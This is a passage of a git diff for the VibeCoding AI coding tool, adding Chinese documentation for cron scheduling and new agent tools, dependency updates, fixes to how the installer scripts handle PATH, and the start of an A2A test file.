+
+项目技能自动从 `.skills/` 加载，无需额外配置。
+
+---
+
+## Cron 基础设施
+
+VibeCoding 已有内部 cron 基础设施（`internal/cron` 包）和 TUI 命令入口。Cron 存储将任务持久化到 `~/.vibecoding/cron.json`，调度器每 30 秒检查一次到期任务。
+
+### `/cron` TUI 命令
+
+需要多 Agent 模式（`--multi-agent` 或 Ctrl+P 切换）：
+
+```
+> /cron add <描述>             — 添加定时任务
+> /cron list                   — 列出定时任务
+> /cron enable <id>            — 启用任务
+> /cron disable <id>           — 禁用任务
+> /cron remove <id>            — 删除任务
+> /cron run <id>               — 立即运行任务
+```
+
+### Cron 任务数据模型
+
+| 字段 | 描述 |
+|------|------|
+| `id` | 唯一任务 ID（如 `cron-1716883200`） |
+| `name` | 任务简短描述 |
+| `prompt` | 发送给子 Agent 的任务提示词 |
+| `schedule` | 5 字段 cron 表达式 |
+| `mode` | `agent` 或 `yolo` |
+| `enabled` | 任务是否激活 |
+| `last_run` | 上次执行时间戳 |
+| `next_run` | 计算得出的下次执行时间 |
+| `run_count` | 总执行次数 |
+| `last_status` | `success`、`failed` 或 `running` |
+
+### 调度器架构
+
+```
+调度器循环 (每 30 秒)
+    │
+    ├── 从存储列出所有已启用任务
+    │
+    ├── 检查每个任务：是否到期？
+    │   ├── 从未运行 → 到期
+    │   ├── NextRun 已过 → 到期
+    │   └── 上次运行超过 1 小时 → 到期（兜底）
+    │
+    └── 到期任务 → 创建子 Agent
+              │
+              ├── 标记任务为 "running"
+              ├── 通过 AgentManager 创建 Agent
+              ├── 使用任务 prompt 运行 Agent
+              ├── 收集结果
+              └── 更新任务状态 (success/failed)
+```
+
+---
+
+## 相关文档
+
+- [技能系统](skills.md) — 本地技能格式和管理
+- [配置详解](configuration.md) — 完整设置参考
+- [安全与沙箱](security.md) — 沙箱和审批控制
diff --git a/docs/zh/tools.md b/docs/zh/tools.md
index 2bf8872..22a5b21 100644
--- a/docs/zh/tools.md
+++ b/docs/zh/tools.md
@@ -14,10 +14,17 @@ VibeCoding 提供了一组内置工具，用于文件操作、代码搜索和命
 | `find` | 文件名搜索 | 只读 |
 | `ls` | 列出目录内容 | 只读 |
 | `plan` | 发布任务计划/状态 | 只读 |
+| `jobs` | 列出和管理后台任务 | 只读 |
+| `kill` | 终止正在运行的后台任务 | 仅 standard/yolo |
+| `question` | 向用户提出多选问题 | 仅 Plan 模式 (TUI) |
+| `memory` | 读写持久记忆 | 仅 Hermes 模式 |
+| `cron` | 管理定时后台任务 | 仅 Hermes/多 Agent 模式 |
 | `subagent_spawn` | 启动委托子 Agent 任务 | 仅多 Agent 模式 |
 | `subagent_status` | 查询子 Agent 状态/结果 | 仅多 Agent 模式 |
 | `subagent_send` | 向子 Agent 发送后续指令 | 仅多 Agent 模式 |
 | `subagent_destroy` | 停止并移除子 Agent | 仅多 Agent 模式 |
+| `a2a_dispatch` | 向远程 A2A Agent 发送任务 | 仅 A2A Master 模式 |
+| `skill_ref` | 加载技能引用文件 | 技能可用时 |
 
 ## 工具详解
 
@@ -131,6 +138,56 @@ VibeCoding 提供了一组内置工具，用于文件操作、代码搜索和命
 
 ---
 
+### a2a_dispatch - A2A 远程 Agent 调度
+
+向 `a2a-list.json` 中注册的远程 A2A Agent 发送任务。仅在使用 `--enable-a2a-master` 启动时注册。
+
+**参数:**
+
+| 参数 | 类型 | 必填 | 描述 |
+|------|------|------|------|
+| `agent_name` | string | ✓ | 目标 agent 名称（从配置自动枚举） |
+| `message` | string | ✓ | 任务消息 |
+
+**示例:**
+
+```json
+{
+  "agent_name": "code-reviewer",
+  "message": "审查 internal/handler.go 的代码质量"
+}
+```
+
+**返回:** 远程 agent 的文本响应
+
+详见 [A2A 协议 - A2A Master 模式](a2a.md#a2a-master-模式)。
+
+---
+
+### skill_ref - 技能引用加载
+
+加载技能目录中的引用文件。仅在有可用技能时注册。
+
+**参数:**
+
+| 参数 | 类型 | 必填 | 描述 |
+|------|------|------|------|
+| `skill` | string | ✓ | 技能名称（目录名） |
+| `ref` | string | ✓ | 引用文件路径（相对于技能目录） |
+
+**示例:**
+
+```json
+{
+  "skill": "my-conventions",
+  "ref": "references/api-style.md"
+}
+```
+
+**返回:** 引用文件内容
+
+---
+
 ### write - 文件写入
 
 创建新文件或覆盖现有文件。
@@ -307,6 +364,138 @@ VibeCoding 提供了一组内置工具，用于文件操作、代码搜索和命
 
 ---
 
+### jobs - 后台任务管理
+
+列出并查看通过 `bash async=true` 启动的后台任务。
+
+**参数:**
+
+| 参数 | 类型 | 必填 | 描述 |
+|------|------|------|------|
+| `jobId` | int | - | 按 ID 获取特定任务的详细状态 |
+| `cleanup` | bool | - | 清理已完成的任务 |
+
+**示例:**
+
+```json
+{}
+```
+
+**返回:** 后台任务列表及状态（运行中/已完成），或特定任务的详细信息（PID、运行时间、stdout、stderr）。
+
+---
+
+### kill - 终止后台任务
+
+终止通过 `bash async=true` 启动的正在运行的后台任务。
+
+**参数:**
+
+| 参数 | 类型 | 必填 | 描述 |
+|------|------|------|------|
+| `jobId` | int | ✓ | 要终止的任务 ID |
+
+**示例:**
+
+```json
+{ "jobId": 3 }
+```
+
+**返回:** 确认消息，包含任务 ID 和 PID。
+
+---
+
+### question - 用户澄清（Plan 模式）
+
+在 Plan 模式下向用户提出多选问题以澄清需求。仅在 TUI + plan 模式下注册。通过 `QuestionHandler` 可选接口（类型断言）暴露；不在 Gateway/Hermes/ACP 中注册。
+
+**参数:**
+
+| 参数 | 类型 | 必填 | 描述 |
+|------|------|------|------|
+| `question` | string | ✓ | 问题文本 |
+| `options` | array | ✓ | 选项列表 |
+
+**示例:**
+
+```json
+{
+  "question": "我们应该使用哪个数据库？",
+  "options": ["PostgreSQL", "SQLite", "MongoDB"]
+}
+```
+
+**返回:** 用户选择的选项或自定义答案。
+
+---
+
+### memory - 持久记忆（Hermes）
+
+读写存储在 `memory.md` 中的持久记忆。记忆跨会话持久保存。仅在 Hermes 模式下可用。
+
+**参数:**
+
+| 参数 | 类型 | 必填 | 描述 |
+|------|------|------|------|
+| `action` | string | ✓ | 操作：`read`、`add`、`update`、`delete` |
+| `section` | string | - | 节名称（如 `User Profile`、`Working Memory`、`Lessons Learned`）。add/update/delete 必填；read 时可选。 |
+| `content` | string | - | add/delete 操作的内容 |
+| `old` | string | - | update 操作的旧文本 |
+| `new` | string | - | update 操作的新替换文本 |
+
+**示例:**
+
+```json
+{
+  "action": "add",
+  "section": "User Profile",
+  "content": "后端开发偏好 Go 而非 Python。"
+}
+```
+
+**返回:** 操作确认或节内容。
+
+---
+
+### cron - 定时任务（Hermes / 多 Agent）
+
+管理通过子 Agent 执行的定时后台任务。在 Hermes 模式和 CLI 多 Agent 模式下可用。
+
+**参数:**
+
+| 参数 | 类型 | 必填 | 描述 |
+|------|------|------|------|
+| `action` | string | ✓ | 操作：`list`、`create`、`enable`、`disable`、`remove`、`run` |
+| `id` | string | - | 任务 ID（enable/disable/remove/run 必填） |
+| `name` | string | - | 任务简短名称（create 必填） |
+| `prompt` | string | - | 子 Agent 任务提示（create 必填） |
+| `schedule` | string | - | 调度：`@daily`、`@weekly`、`@monthly`、`@hourly`、`@every 30m`、`@every 2h`，或为空表示单次执行 |
+| `oneshot` | bool | - | 为 true 时执行一次后自动禁用 |
+| `mode` | string | - | Agent 模式：`agent` 或 `yolo`（默认 `yolo`） |
+
+**示例:**
+
+```json
+{
+  "action": "create",
+  "name": "daily-check",
+  "prompt": "检查过时的依赖并报告。",
+  "schedule": "@daily"
+}
+```
+
+**返回:** 任务列表、创建确认或操作结果。
+
+---
+
+### MCP 动态工具
+
+来自 MCP（Model Context Protocol）服务器的工具、资源和提示在每个会话中自动发现和注册。工具名称和参数由 MCP 服务器定义，而非 VibeCoding。MCP 工具会与内置工具一起出现在工具列表中。
+
+详见 [技能](skills.md) 和 [配置](configuration.md) 了解 MCP 服务器设置。
+
+---
+
 ## 工具使用模式
 
 ### 读取-修改-写入模式
diff --git a/go.mod b/go.mod
index d16087e..bde92df 100644
--- a/go.mod
+++ b/go.mod
@@ -7,7 +7,9 @@ require (
 	github.com/charmbracelet/bubbletea v1.3.4
 	github.com/charmbracelet/glamour v1.0.0
 	github.com/charmbracelet/lipgloss v1.1.1-0.20250404203927-76690c660834
+	github.com/larksuite/oapi-sdk-go/v3 v3.9.3
 	github.com/spf13/cobra v1.10.2
+	golang.org/x/net v0.38.0
 	golang.org/x/sys v0.37.0
 	golang.org/x/term v0.36.0
 )
@@ -24,7 +26,9 @@ require (
 	github.com/charmbracelet/x/term v0.2.1 // indirect
 	github.com/dlclark/regexp2 v1.11.5 // indirect
 	github.com/erikgeiser/coninput v0.0.0-20211004153227-1c3628e74d0f // indirect
+	github.com/gogo/protobuf v1.3.2 // indirect
 	github.com/gorilla/css v1.0.1 // indirect
+	github.com/gorilla/websocket v1.5.0 // indirect
 	github.com/inconshreveable/mousetrap v1.1.0 // indirect
 	github.com/lucasb-eyer/go-colorful v1.3.0 // indirect
 	github.com/mattn/go-isatty v0.0.20 // indirect
@@ -40,7 +44,6 @@ require (
 	github.com/xo/terminfo v0.0.0-20220910002029-abceb7e1c41e // indirect
 	github.com/yuin/goldmark v1.7.13 // indirect
 	github.com/yuin/goldmark-emoji v1.0.6 // indirect
-	golang.org/x/net v0.38.0 // indirect
 	golang.org/x/sync v0.17.0 // indirect
 	golang.org/x/text v0.30.0 // indirect
 )
diff --git a/go.sum b/go.sum
index 174f8a1..1615bcb 100644
--- a/go.sum
+++ b/go.sum
@@ -37,12 +37,20 @@ github.com/dlclark/regexp2 v1.11.5 h1:Q/sSnsKerHeCkc/jSTNq1oCm7KiVgUMZRDUoRu0JQZ
 github.com/dlclark/regexp2 v1.11.5/go.mod h1:DHkYz0B9wPfa6wondMfaivmHpzrQ3v9q8cnmRbL6yW8=
 github.com/erikgeiser/coninput v0.0.0-20211004153227-1c3628e74d0f h1:Y/CXytFA4m6baUTXGLOoWe4PQhGxaX0KpnayAqC48p4=
 github.com/erikgeiser/coninput v0.0.0-20211004153227-1c3628e74d0f/go.mod h1:vw97MGsxSvLiUE2X8qFplwetxpGLQrlU1Q9AUEIzCaM=
+github.com/gogo/protobuf v1.3.2 h1:Ov1cvc58UF3b5XjBnZv7+opcTcQFZebYjWzi34vdm4Q=
+github.com/gogo/protobuf v1.3.2/go.mod h1:P1XiOD3dCwIKUDQYPy72D8LYyHL2YPYrpS2s69NZV8Q=
 github.com/gorilla/css v1.0.1 h1:ntNaBIghp6JmvWnxbZKANoLyuXTPZ4cAMlo6RyhlbO8=
 github.com/gorilla/css v1.0.1/go.mod h1:BvnYkspnSzMmwRK+b8/xgNPLiIuNZr6vbZBTPQ2A3b0=
+github.com/gorilla/websocket v1.5.0 h1:PPwGk2jz7EePpoHN/+ClbZu8SPxiqlu12wZP/3sWmnc=
+github.com/gorilla/websocket v1.5.0/go.mod h1:YR8l580nyteQvAITg2hZ9XVh4b55+EU/adAjf1fMHhE=
 github.com/hexops/gotextdiff v1.0.3 h1:gitA9+qJrrTCsiCl7+kh75nPqQt1cx4ZkudSTLoUqJM=
 github.com/hexops/gotextdiff v1.0.3/go.mod h1:pSWU5MAI3yDq+fZBTazCSJysOMbxWL1BSow5/V2vxeg=
 github.com/inconshreveable/mousetrap v1.1.0 h1:wN+x4NVGpMsO7ErUn/mUI3vEoE6Jt13X2s0bqwp9tc8=
 github.com/inconshreveable/mousetrap v1.1.0/go.mod h1:vpF70FUmC8bwa3OWnCshd2FqLfsEA9PFc4w1p2J65bw=
+github.com/kisielk/errcheck v1.5.0/go.mod h1:pFxgyoBC7bSaBwPgfKdkLd5X25qrDl4LWUI2bnpBCr8=
+github.com/kisielk/gotool v1.0.0/go.mod h1:XhKaO+MFFWcvkIS/tQcRk01m1F5IRFswLeQ+oQHNcck=
+github.com/larksuite/oapi-sdk-go/v3 v3.9.3 h1:iNFKhvOMthaHw5GVrbwdcGbzKkGpHR1ITWpp6fe3Rhk=
+github.com/larksuite/oapi-sdk-go/v3 v3.9.3/go.mod h1:ZEplY+kwuIrj/nqw5uSCINNATcH3KdxSN7y+UxYY5fI=
 github.com/lucasb-eyer/go-colorful v1.3.0 h1:2/yBRLdWBZKrf7gB40FoiKfAWYQ0lqNcbuQwVHXptag=
 github.com/lucasb-eyer/go-colorful v1.3.0/go.mod h1:R4dSotOR9KMtayYi1e77YzuveK+i7ruzyGqttikkLy0=
 github.com/mattn/go-isatty v0.0.20 h1:xfD0iDuEKnDkl03q4limB+vH+GxLEtL/jb4xVJSWWEY=
@@ -73,23 +81,50 @@ github.com/spf13/pflag v1.0.9 h1:9exaQaMOCwffKiiiYk6/BndUBv+iRViNW+4lEMi0PvY=
 github.com/spf13/pflag v1.0.9/go.mod h1:McXfInJRrz4CZXVZOBLb0bTZqETkiAhM9Iw0y3An2Bg=
 github.com/xo/terminfo v0.0.0-20220910002029-abceb7e1c41e h1:JVG44RsyaB9T2KIHavMF/ppJZNG9ZpyihvCd0w101no=
 github.com/xo/terminfo v0.0.0-20220910002029-abceb7e1c41e/go.mod h1:RbqR21r5mrJuqunuUZ/Dhy/avygyECGrLceyNeo4LiM=
+github.com/yuin/goldmark v1.1.27/go.mod h1:3hX8gzYuyVAZsxl0MRgGTJEmQBFcNTphYh9decYSb74=
+github.com/yuin/goldmark v1.2.1/go.mod h1:3hX8gzYuyVAZsxl0MRgGTJEmQBFcNTphYh9decYSb74=
 github.com/yuin/goldmark v1.7.13 h1:GPddIs617DnBLFFVJFgpo1aBfe/4xcvMc3SB5t/D0pA=
 github.com/yuin/goldmark v1.7.13/go.mod h1:ip/1k0VRfGynBgxOz0yCqHrbZXhcjxyuS66Brc7iBKg=
 github.com/yuin/goldmark-emoji v1.0.6 h1:QWfF2FYaXwL74tfGOW5izeiZepUDroDJfWubQI9HTHs=
 github.com/yuin/goldmark-emoji v1.0.6/go.mod h1:ukxJDKFpdFb5x0a5HqbdlcKtebh086iJpI31LTKmWuA=
 go.yaml.in/yaml/v3 v3.0.4/go.mod h1:DhzuOOF2ATzADvBadXxruRBLzYTpT36CKvDb3+aBEFg=
+golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w=
+golang.org/x/crypto v0.0.0-20191011191535-87dc89f01550/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI=
+golang.org/x/crypto v0.0.0-20200622213623-75b288015ac9/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto=
 golang.org/x/exp v0.0.0-20220909182711-5c715a9e8561 h1:MDc5xs78ZrZr3HMQugiXOAkSZtfTpbJLDr/lwfgO53E=
 golang.org/x/exp v0.0.0-20220909182711-5c715a9e8561/go.mod h1:cyybsKvd6eL0RnXn6p/Grxp8F5bW7iYuBgsNCOHpMYE=
+golang.org/x/mod v0.2.0/go.mod h1:s0Qsj1ACt9ePp/hMypM3fl4fZqREWJwdYDEqhRiZZUA=
+golang.org/x/mod v0.3.0/go.mod h1:s0Qsj1ACt9ePp/hMypM3fl4fZqREWJwdYDEqhRiZZUA=
+golang.org/x/net v0.0.0-20190404232315-eb5bcb51f2a3/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg=
+golang.org/x/net v0.0.0-20190620200207-3b0461eec859/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s=
+golang.org/x/net v0.0.0-20200226121028-0de0cce0169b/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s=
+golang.org/x/net v0.0.0-20201021035429-f5854403a974/go.mod h1:sp8m0HH+o8qH0wwXwYZr8TS3Oi6o0r6Gce1SSxlDquU=
 golang.org/x/net v0.38.0 h1:vRMAPTMaeGqVhG5QyLJHqNDwecKTomGeqbnfZyKlBI8=
 golang.org/x/net v0.38.0/go.mod h1:ivrbrMbzFq5J41QOQh0siUuly180yBYtLp+CKbEaFx8=
+golang.org/x/sync v0.0.0-20190423024810-112230192c58/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
+golang.org/x/sync v0.0.0-20190911185100-cd5d95a43a6e/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
+golang.org/x/sync v0.0.0-20201020160332-67f06af15bc9/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
 golang.org/x/sync v0.17.0 h1:l60nONMj9l5drqw6jlhIELNv9I0A4OFgRsG9k2oT9Ug=
 golang.org/x/sync v0.17.0/go.mod h1:9KTHXmSnoGruLpwFjVSX0lNNA75CykiMECbovNTZqGI=
+golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
+golang.org/x/sys v0.0.0-20190412213103-97732733099d/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
+golang.org/x/sys v0.0.0-20200930185726-fdedc70b468f/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
 golang.org/x/sys v0.0.0-20210809222454-d867a43fc93e/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
 golang.org/x/sys v0.6.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
 golang.org/x/sys v0.37.0 h1:fdNQudmxPjkdUTPnLn5mdQv7Zwvbvpaxqs831goi9kQ=
 golang.org/x/sys v0.37.0/go.mod h1:OgkHotnGiDImocRcuBABYBEXf8A9a87e/uXjp9XT3ks=
 golang.org/x/term v0.36.0 h1:zMPR+aF8gfksFprF/Nc/rd1wRS1EI6nDBGyWAvDzx2Q=
 golang.org/x/term v0.36.0/go.mod h1:Qu394IJq6V6dCBRgwqshf3mPF85AqzYEzofzRdZkWss=
+golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ=
+golang.org/x/text v0.3.3/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ=
 golang.org/x/text v0.30.0 h1:yznKA/E9zq54KzlzBEAWn1NXSQ8DIp/NYMy88xJjl4k=
 golang.org/x/text v0.30.0/go.mod h1:yDdHFIX9t+tORqspjENWgzaCVXgk0yYnYuSZ8UzzBVM=
+golang.org/x/tools v0.0.0-20180917221912-90fa682c2a6e/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ=
+golang.org/x/tools v0.0.0-20191119224855-298f0cb1881e/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo=
+golang.org/x/tools v0.0.0-20200619180055-7c47624df98f/go.mod h1:EkVYQZoAsY45+roYkvgYkIh4xh/qjgUK9TdY2XT94GE=
+golang.org/x/tools v0.0.0-20210106214847-113979e3529a/go.mod h1:emZCQorbCU4vsT4fOWvOPXz4eW1wZW4PmDk9uLelYpA=
+golang.org/x/xerrors v0.0.0-20190717185122-a985d3407aa7/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
+golang.org/x/xerrors v0.0.0-20191011141410-1b5146add898/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
+golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
+golang.org/x/xerrors v0.0.0-20200804184101-5ec99f83aff1/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
 gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0=
diff --git a/install.ps1 b/install.ps1
index 16d1a38..6357d2f 100644
--- a/install.ps1
+++ b/install.ps1
@@ -100,11 +100,17 @@ try {
     # Add to PATH if not already present
     $currentPath = [Environment]::GetEnvironmentVariable("Path", "User")
 
-    if ($currentPath -notlike "*$installDir*") {
+    # Use exact matching by splitting PATH into entries
+    $pathEntries = if ($currentPath) { $currentPath -split ';' | Where-Object { $_ -ne '' } } else { @() }
+
+    if ($pathEntries -notcontains $installDir) {
         Write-Info "Adding $installDir to PATH..."
-        [Environment]::SetEnvironmentVariable("Path", "$currentPath;$installDir", "User")
-        $env:Path = "$env:Path;$installDir"
-        Write-Success "Added to PATH (restart terminal to take effect)"
+        # Safely join without leading/trailing semicolons
+        $newPath = if ($currentPath) { "$currentPath;$installDir" } else { $installDir }
+        [Environment]::SetEnvironmentVariable("Path", $newPath, "User")
+        # Update current session PATH so user can use it immediately
+        $env:Path = [Environment]::GetEnvironmentVariable("Path", "Machine") + ";" + [Environment]::GetEnvironmentVariable("Path", "User")
+        Write-Success "Added to PATH (restart other terminals to take effect)"
     } else {
         Write-Info "$installDir is already in PATH"
     }
@@ -116,17 +122,37 @@ try {
     Write-Host ""
     Write-Success "Installation complete!"
     Write-Host ""
-    Write-Host "  Version: $version" -ForegroundColor White
-    Write-Host ""
-    Write-Host "  Config directory: $configDir" -ForegroundColor White
-    Write-Host "    - Settings file : $settingsPath" -ForegroundColor Gray
-    Write-Host ""
-    Write-Host "  Get started:" -ForegroundColor White
-    Write-Host "    vibecoding --help" -ForegroundColor Gray
+    Write-Host "  Install directory: $destPath" -ForegroundColor White
+    Write-Host "  Config directory : $configDir" -ForegroundColor White
+    Write-Host "    - Settings file: $settingsPath" -ForegroundColor Gray
     Write-Host ""
-    Write-Host "  Note: Restart your terminal to use vibecoding" -ForegroundColor Yellow
+    Write-Host "  Version: $version" -ForegroundColor White
     Write-Host ""
 
+    # Check if vibecoding is available
+    $vibecodingPath = Get-Command vibecoding -ErrorAction SilentlyContinue
+    if ($vibecodingPath) {
+        Write-Host "  Get started:" -ForegroundColor White
+        Write-Host "    vibecoding --help" -ForegroundColor Gray
+        Write-Host ""
+    } else {
+        Write-Warn "'vibecoding' is not found in your current PATH."
+        Write-Host ""
+        Write-Host "  To add it to your PATH manually:" -ForegroundColor White
+        Write-Host ""
+        Write-Host "  # PowerShell (current session):" -ForegroundColor Cyan
+        Write-Host "    \$env:Path += \";$installDir\"" -ForegroundColor Cyan
+        Write-Host ""
+        Write-Host "  # PowerShell (permanent, current user):" -ForegroundColor Cyan
+        Write-Host "    [Environment]::SetEnvironmentVariable('Path', \$env:Path + ';$installDir', 'User')" -ForegroundColor Cyan
+        Write-Host ""
+        Write-Host "  # CMD (permanent, current user):" -ForegroundColor Cyan
+        Write-Host "    setx Path \"%Path%;$installDir\"" -ForegroundColor Cyan
+        Write-Host ""
+        Write-Host "  # Or add via System Settings > Environment Variables > User PATH" -ForegroundColor Cyan
+        Write-Host ""
+    }
+
 } catch {
     Write-Error "Installation failed: $_"
 } finally {
diff --git a/install.sh b/install.sh
index 134dab1..f0c7bd2 100755
--- a/install.sh
+++ b/install.sh
@@ -5,6 +5,11 @@ set -euo pipefail
 trap 'error "Installation failed at line $LINENO."' ERR
 
 # VibeCoding Installer
+# Progressive and agile vibe-coding tool. No need to re-deploy Claw/Hermes;
+# everything is packed into a single file.
+# 主打渐进式、敏捷开发体验的 VibeCoding 工具，整体打包为单个文件，开箱即用，
+# 无需重复搭建部署 Claude Code、codex、Claw、Hermes 环境。
+#
 # Downloads and installs the latest release from GitHub
 #
 # Supports non-root installation to ~/.vibecoding/bin
@@ -172,13 +177,19 @@ detect_shell_config() {
             fi
             ;;
         bash)
-            # .bashrc is most common; .bash_profile for login shells on macOS
-            if [ -f "${HOME}/.bashrc" ]; then
-                echo "${HOME}/.bashrc"
-            elif [ -f "${HOME}/.bash_profile" ]; then
-                echo "${HOME}/.bash_profile"
+            # macOS uses login shells by default, so .bash_profile takes precedence
+            if [ "$(uname -s)" = "Darwin" ]; then
+                if [ -f "${HOME}/.bash_profile" ]; then
+                    echo "${HOME}/.bash_profile"
+                elif [ -f "${HOME}/.bashrc" ]; then
+                    echo "${HOME}/.bashrc"
+                else
+                    echo "${HOME}/.bash_profile"
+                fi
             else
-                if [ "$(uname -s)" = "Darwin" ]; then
+                if [ -f "${HOME}/.bashrc" ]; then
+                    echo "${HOME}/.bashrc"
+                elif [ -f "${HOME}/.bash_profile" ]; then
                     echo "${HOME}/.bash_profile"
                 else
                     echo "${HOME}/.bashrc"
@@ -222,7 +233,8 @@ add_to_path() {
     local path_line
     case "$shell_name" in
         fish)
-            path_line="set -gx PATH ${INSTALL_DIR} \$PATH"
+            # Single-quote $PATH to prevent bash from expanding it
+            path_line="set -gx PATH ${INSTALL_DIR} "'$PATH'
             ;;
         *)
             path_line="export PATH=\"${INSTALL_DIR}:\$PATH\""
@@ -238,16 +250,27 @@ add_to_path() {
 
 # Check if installed directory is in PATH
 check_path() {
-    # If already in PATH, nothing to do
+    local config_file
+    config_file=$(detect_shell_config)
+
+    # First check if already configured in shell config file
+    if [ -f "$config_file" ] && grep -q "\.vibecoding/bin" "$config_file" 2>/dev/null; then
+        # Already in config, but check if it's in current session too
+        if echo "$PATH" | tr ':' '\n' | grep -qx "$INSTALL_DIR"; then
+            return 0
+        fi
+        info "PATH already configured in ${config_file} but not active in current session"
+        warn "Run: source ${config_file}"
+        return 0
+    fi
+
+    # If already in current PATH, nothing to do
     if echo "$PATH" | tr ':' '\n' | grep -qx "$INSTALL_DIR"; then
         return 0
     fi
     
     # For user-level install, auto-add to shell config
     if [ "$INSTALL_DIR" = "$USER_INSTALL_DIR" ]; then
-        local config_file
-        config_file=$(detect_shell_config)
-        
         echo ""
         info "Detected shell: $(basename "${SHELL:-bash}")"
         info "Shell config: ${config_file}"
@@ -396,31 +419,57 @@ main() {
 
     # Verify installation
     echo ""
+    success "Installation complete!"
+    echo ""
+    echo "  Install directory: ${INSTALL_DIR}/${BINARY_NAME}"
+    echo "  Config directory : ${config_dir}"
+    echo "    - Settings file: ${config_dir}/settings.json"
+    echo ""
+
     if command -v "$BINARY_NAME" &> /dev/null; then
         local installed_version
         installed_version=$("$BINARY_NAME" --version 2>/dev/null || echo "unknown")
-        success "Installation complete!"
-        echo ""
         echo "  Version: ${installed_version}"
         echo ""
-        echo "  Config directory: ${config_dir}"
-        echo "    - Settings file : ${config_dir}/settings.json"
-        echo ""
         echo "  Get started:"
         echo "    ${BINARY_NAME} --help"
         echo ""
     else
-        success "Installation complete!"
+        warn "'${BINARY_NAME}' is not found in your current PATH."
         echo ""
-        echo "  Binary installed to:"
-        echo "    ${INSTALL_DIR}/${BINARY_NAME}"
+        echo "  Add it to your PATH manually:"
         echo ""
-        echo "  Config directory: ${config_dir}"
-        echo "    - Settings file : ${config_dir}/settings.json"
-        echo ""
-        echo "  To use right now:"
-        echo "    export PATH=\"${INSTALL_DIR}:\$PATH\""
-        echo "    ${BINARY_NAME} --help"
+        local shell_name
+        shell_name="$(basename "${SHELL:-bash}")"
+        case "$shell_name" in
+            fish)
+                echo -e "  ${CYAN}# Fish${NC}"
+                echo -e "  ${CYAN}set -gx PATH ${INSTALL_DIR} \$PATH${NC}"
+                echo -e "  ${CYAN}# Or add to ~/.config/fish/config.fish:${NC}"
+                echo -e "  ${CYAN}set -gx PATH ${INSTALL_DIR} \$PATH${NC}"
+                ;;
+            zsh)
+                echo -e "  ${CYAN}# Zsh${NC}"
+                echo -e "  ${CYAN}export PATH=\"${INSTALL_DIR}:\$PATH\"${NC}"
+                echo -e "  ${CYAN}# Or add to ~/.zshenv:${NC}"
+                echo -e "  ${CYAN}echo 'export PATH=\"${INSTALL_DIR}:\$PATH\"' >> ~/.zshenv${NC}"
+                ;;
+            bash)
+                echo -e "  ${CYAN}# Bash${NC}"
+                echo -e "  ${CYAN}export PATH=\"${INSTALL_DIR}:\$PATH\"${NC}"
+                if [ "$(uname -s)" = "Darwin" ]; then
+                    echo -e "  ${CYAN}# Or add to ~/.bash_profile:${NC}"
+                    echo -e "  ${CYAN}echo 'export PATH=\"${INSTALL_DIR}:\$PATH\"' >> ~/.bash_profile${NC}"
+                else
+                    echo -e "  ${CYAN}# Or add to ~/.bashrc:${NC}"
+                    echo -e "  ${CYAN}echo 'export PATH=\"${INSTALL_DIR}:\$PATH\"' >> ~/.bashrc${NC}"
+                fi
+                ;;
+            *)
+                echo -e "  ${CYAN}export PATH=\"${INSTALL_DIR}:\$PATH\"${NC}"
+                echo -e "  ${CYAN}# Add the above line to your shell config file${NC}"
+                ;;
+        esac
         echo ""
     fi
 }
diff --git a/internal/a2a/a2a_test.go b/internal/a2a/a2a_test.go
new file mode 100644
index 0000000..277aa3b
--- /dev/null
+++ b/internal/a2a/a2a_test.go
@@ -0,0 +1,712 @@
+package a2a
+
+import (
+	"context"
+	"encoding/json"
+	"net/http"
+	"net/http/httptest"
+	"strings"
+	"sync"
+	"testing"
+	"time"
+)
+
+func TestDefaultConfig(t *testing.T) {
+	cfg := DefaultConfig()
+	if cfg.Port != 8093 {
+		t.Errorf("expected port 8093, got %d", cfg.Port)
+	}
+	if cfg.Host != "127.0.0.1" {
+		t.Errorf("expected host 127.0.0.1, got %s", cfg.Host)
+	}
+	if cfg.Enabled {
+		t.Error("expected disabled by default")
+	}
+}
+
+func TestGetListenAddr(t *testing.T) {
+	cfg := &Config{Host: "127.0.0.1", Port: 9090}
+	if addr := cfg.GetListenAddr(); addr != "127.0.0.1:9090" {
+		t.Errorf("expected 127.0.0.1:9090, got %s", addr)
+	}
+}
+
+func TestGetWorkDir(t *testing.T) {
